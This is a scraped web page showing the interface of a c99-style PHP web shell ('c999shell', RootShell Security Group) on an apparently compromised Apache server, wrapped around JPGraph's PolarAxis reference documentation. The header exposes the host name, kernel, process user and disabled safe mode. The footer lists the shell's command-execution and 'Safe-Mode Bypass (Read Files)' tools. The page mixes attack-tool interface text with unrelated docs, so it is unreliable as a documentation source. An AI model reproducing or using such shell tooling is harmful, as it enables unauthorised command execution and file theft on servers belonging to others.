Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/jpgraph/docs/ref/ drwxr-xr-x |
Viewing file: PolarAxis.html (19.22 KB) -rw-r--r-- Select action/file-type: (+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) | CLASS PolarAxis EXTENDS Axis
(Defined in: jpgraph_polar.php : 151)Class usage and Overview Represents the different axis for a polar plot. This class holds the property both for the radius and the angle axis classes. It is accessed throught the 'axis' property in the PolarGraph class.
See also related classes: PolarGraph
Class Methods
Description HIde ticks marks Example $polargraph->axis->HideTicks(false,true);
Description Set font for angle labels on the polar graph. Example
Description Specify the angle step, in degrees, between the angle markers. Example $polargraph->axis->SetAngleStep(20);
Description Specify axis and label colors. See also PolarAxis::SetGridColor
Example
Description Set colors for the various grids Example $polargraph->axis->SetGridColor('lightgray','lightgray','lightgray');
Description Specify color for axis tick marks Example
Description Add a degree mark after each angel label ( a small sperscripted 'o' ). This is enabled by default. Example
Description Show angle labels. This is on by default. Example $polargraph->axis->ShowAngleLabel();
Description Determine what grid lines should be visible. Example $polargraph->axis->ShowGrid(true,false,true);
|
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0156 ]-- |